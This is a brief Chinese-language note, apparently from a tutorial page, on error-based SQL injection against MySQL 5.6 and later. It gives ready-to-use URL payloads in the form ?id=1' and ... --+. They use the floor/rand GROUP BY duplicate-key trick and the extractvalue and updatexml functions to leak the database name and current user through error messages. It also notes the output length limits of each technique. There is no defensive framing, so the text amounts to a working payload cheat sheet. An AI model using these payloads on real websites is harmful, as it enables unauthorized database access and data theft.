利用报错注入,mysql5.6以上有三种
第一种 利用floor构造重复键group by报错
输出字符长度限制为64个字符
?id=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
第二种 updatexml和extractvalue 基于 ~ 符号报错
注意的是这种最多能报32位长度,如果有更多位数请使用字符串截取函数
?id=1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) --+
?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+
网友评论